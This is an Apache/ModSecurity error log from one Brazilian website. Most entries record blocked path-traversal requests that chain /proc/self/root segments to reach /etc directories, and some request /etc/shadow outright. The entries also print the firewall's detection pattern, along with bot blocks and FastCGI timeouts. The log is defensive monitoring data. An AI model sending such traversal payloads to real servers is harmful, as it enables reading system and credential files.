[Wed Mar 18 00:29:11.590368 2026] [:error] [pid 29882:tid 140411716749056] [client 74.7.243.128:40690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abocB0zinOy1jxa1j4e9dwAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:29:13.243349 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:35578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abocCeyqAr6etmhZHNpikgAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:29:31.149800 2026] [proxy_fcgi:error] [pid 30821:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:33494] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:29:37.000559 2026] [:error] [pid 19507:tid 140411565680384] [client 216.73.216.191:54004] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abocINY0UrI5A3LftIw7SgAAAZU"]
[Wed Mar 18 00:29:43.795712 2026] [:error] [pid 29882:tid 140411699963648] [client 74.7.241.31:38648] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abocJ0zinOy1jxa1j4e9igAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:29:53.115743 2026] [proxy_fcgi:error] [pid 31803:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:33956] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:29:55.870953 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.244.43:58450] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abocM9a6ubjKNq_cu4ZBpgAAA1U"]
[Wed Mar 18 00:29:59.715632 2026] [:error] [pid 15051:tid 140411666392832] [client 216.73.216.191:57237] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abocNymAPhZkrhU8w4kcMgAAAIk"]
[Wed Mar 18 00:30:09.962215 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.228.61:37634] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abocQUzinOy1jxa1j4e9jAAAARQ"]
[Wed Mar 18 00:30:15.121814 2026] [proxy_fcgi:error] [pid 19507:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:34356] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:30:24.523441 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:58394] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abocUOoXxyEfFpUF8f8ZBQAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:30:26.218971 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.241.31:38660] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abocUuyqAr6etmhZHNpirAAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:30:31.590494 2026] [:error] [pid 31803:tid 140411641214720] [client 216.73.216.191:42599] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abocV-yqAr6etmhZHNpirgAAAEw"]
[Wed Mar 18 00:30:39.125821 2026] [proxy_fcgi:error] [pid 17653:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:34696] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:31:01.125787 2026] [proxy_fcgi:error] [pid 15051:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:35094] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:31:23.125803 2026] [proxy_fcgi:error] [pid 29882:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:35454] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:31:24.688385 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.243.128:35586] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abocjOw_le52K8_3pV2L9gAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 00:31:37.660706 2026] [:error] [pid 29882:tid 140411557287680] [client 74.7.241.31:56196] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abocmUzinOy1jxa1j4e90QAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:31:45.137853 2026] [proxy_fcgi:error] [pid 17887:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:35818] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:32:04.772070 2026] [:error] [pid 15051:tid 140411666392832] [client 74.7.241.31:58574] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboctCmAPhZkrhU8w4kcXgAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:32:06.137895 2026] [proxy_fcgi:error] [pid 31803:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:36314] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:32:08.504042 2026] [:error] [pid 11816:tid 140411649607424] [client 74.7.243.128:35722] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abocuOw_le52K8_3pV2MGQAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:32:27.129817 2026] [proxy_fcgi:error] [pid 11816:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:36612] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:32:28.306428 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:40786] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboczNY0UrI5A3LftIw7hwAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:32:49.029804 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:36932] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:33:10.049868 2026] [proxy_fcgi:error] [pid 26799:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:37218] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:33:10.616685 2026] [:error] [pid 29882:tid 140411741927168] [client 74.7.243.128:51098] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboc9kzinOy1jxa1j4e99wAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:33:28.533234 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.241.31:33442] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abodCOw_le52K8_3pV2MZgAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 00:33:31.117520 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:48408] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abodC9a6ubjKNq_cu4ZB5AAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:33:32.129818 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:37540] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:33:35.829563 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.241.31:48410] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abodD-yqAr6etmhZHNpi7wAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:33:38.716591 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:51710] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abodEuyqAr6etmhZHNpi8gAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:33:40.371091 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:44506] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abodFMdf6f5d65gmYZR8eQAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:33:43.031722 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.243.128:44516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abodF_u8EFLIOrSqIpu1WwAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
